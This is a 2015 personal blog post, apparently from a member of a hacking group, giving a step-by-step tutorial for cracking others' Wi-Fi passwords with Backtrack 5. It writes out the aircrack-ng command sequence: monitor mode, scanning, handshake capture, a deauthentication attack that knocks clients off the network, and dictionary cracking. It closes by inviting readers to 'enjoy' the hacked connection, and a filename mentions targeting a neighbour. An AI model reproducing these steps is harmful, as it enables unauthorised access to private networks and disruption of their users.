Sunday 4 January 2015

How to hack Wifi password


Shams Khan Swati

How to hack wifi password


nr1

Hello everybody i am shams ,
 and today i’m gonna show you how to hack any wi-fi passwords using backtrack 5
1st thnks 4 my All Team members PCS (pak cyber skullzz) especially My Team captin Skull Hacker :) :P
===============================================================================
What We Need to hack Wi-fi Password?
1st 
Downlod Here   <—————–
Downlod Here  <—————–
Downlod Here  <—————–
Then Start back tack :)
1)Backtrack 5 [ R1 or R2]
fern_3
2)Compatable Wi-fi Card this is must
So Let’s Start… 1st open Terminal and Then Follow My Steps :
1)In Terminal type : airmon-ng
there we can see interfaces
2)Then type :airmon-ng start wlan0
It must found proceses
3)then we type : airodump-ng mon0
it will start scanning wi-fi networks
4)copy bssid and tpye : airodump-ng -c (channel) -w (file name) –bssid (bssid) mon0
5)type : aireplay-ng -0 5 -a (bssid) mon0
6)click on places home folder drag in terminal wpa-01.cap in terminal and type : aircrack-ng (file Directory) or drag file in terminal
7)type in terminal : aircrack-ng (filename)*.cap -w (dictionary location) And Hit Enter!
Success!
password now has been hacked…. so you can enter and enjoy with hacked wi-fi : ))
hack-like-pro-get-even-with-your-annoying-neighbor-by-bumping-them-off-their-wifi-network-undetected.w6546th_command

0 comments:

Post a Comment